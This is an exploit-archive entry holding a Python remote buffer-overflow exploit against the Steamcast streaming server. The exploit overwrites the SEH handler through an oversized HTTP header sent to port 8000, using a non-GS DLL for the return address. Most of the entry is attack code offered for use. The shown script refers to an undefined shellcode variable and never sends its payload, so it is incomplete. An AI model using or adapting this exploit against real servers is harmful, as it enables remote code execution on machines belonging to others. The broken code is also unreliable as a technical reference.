Steamcast (HTTP Request) Remote Buffer Overflow Exploit (SEH) [1]

ID 1337DAY-ID-9426
Type zdt
Reporter His0k4
Modified 2009-04-13T00:00:00


Exploit for windows platform in category remote exploits

Steamcast (HTTP Request) Remote Buffer Overflow Exploit (SEH) [1]

#[*] Usage   : [victime_ip]
#[*] Bug     : Steamcast(HTTP Request) Remote Buffer Overflow Exploit (SEH) [1]
#[*] Founder : Luigi Auriemma, thx to overflow3r for informing me about the vuln.        
#[*] Tested on :    Xp sp2 (fr)
#[*] Exploited by : His0k4
#[*] Greetings :    All friends & muslims HaCkErs (DZ),,
#[*] Chi3arona houa : Serra7 merra7,koulchi mderra7 :D
#[*] Translate by Cyb3r-1st : esse7 embe7 embou :p

#Note : The problem is that we need to find a dll wich its not compiled with GS, in my case i founded idmmbc its a loaded dll of internet download manager so try to find an unsafe dll.

import sys, socket
import struct

host = sys.argv[1]
port = 8000

# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub

exploit = "\x41"*1003 + "\xEB\x06\x90\x90" + "\xDB\x27\x02\x10" + "\x90"*20 + shellcode

while 1:
	s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((host, port))
	head =  "GET / HTTP/1.1\r\n"
	head += "Host: "+host+"\r\n"
	head += exploit+"\r\n"
	head += "\r\n\r\n"


# [2018-01-02]  #